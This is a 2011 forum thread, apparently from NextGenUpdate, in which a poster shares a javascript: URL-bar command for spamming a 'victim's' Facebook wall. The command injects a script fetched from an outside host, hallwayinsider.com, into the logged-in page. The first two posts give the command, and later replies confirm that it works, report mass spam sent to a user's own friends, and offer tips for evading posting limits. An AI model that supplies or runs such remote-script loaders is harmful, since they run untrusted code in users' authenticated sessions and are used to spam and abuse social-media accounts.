04-26-2011, 03:54 AM #1
(adsbygoogle = window.adsbygoogle || []).push({});
You must login or register to view this content.

Just go to the Facebook Profile of your victim and type this in the url bar and hit enter

CODE:
     javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

then a popup will appear enter how many messages you want to spam hit enter then enter your message

Last edited by NextGenTactics ; 04-26-2011 at 03:59 AM.

The following 9 users say thank you to NextGenTactics for this useful post:

ᴬustin_Powers, <Jimbo>, ANTHONY_MEEK, Curt, DaenerysTargy, Darknesse13, FourzerotwoFAILS, Fuser's Hoe, xRafiq-
04-26-2011, 08:09 AM #2
Outlasted Wolf
Do a barrel roll!
Originally posted by NextGenTactics View Post

Just go to the Facebook Profile of your victim and type this in the url bar and hit enter

CODE:
     javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

then a popup will appear enter how many messages you want to spam hit enter then enter your message

Yeah it's good but you look a bit like an ass-hole cos you spammed your mate... :mad: Otherwise works fine ^^

The following user thanked Outlasted Wolf for this useful post:

Curt
04-26-2011, 11:49 AM #3
-Syed-
< ^ > < ^ >

CODE:

Now what do i have to do? :cry:
04-26-2011, 12:00 PM #4
x420XP
Utter Perfectionist
I accidentally spammed everyone of my friends with a javascript code very similar to this "/ I now feel like a right dick, 600+ friends being spammed with the same wall post =S
04-26-2011, 06:02 PM #5
<Jimbo>
</Jimbo>
Yes NGT! :love:
04-27-2011, 05:29 AM #6
.RAMBO
Banned
Works good. :y:
04-27-2011, 06:01 AM #7
Protip: don't spam too many messages at once or you'll get "blocked" from posting on people's walls...
Fook man
04-27-2011, 07:11 AM #8
mrbonno
High Like a Cheese Spliff
what browser doesn't seem to work on chrome or firefox?
04-27-2011, 07:17 AM #9
ZoneHD
Shiver do you lift?

CODE:

This has already been posted.
04-27-2011, 09:59 AM #10

CODE:

Thats sweet! pretty cool how you can insert a script through the url bar, i wonder if there are ways of creating URL links that do this? or maybe from an external application Smile

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo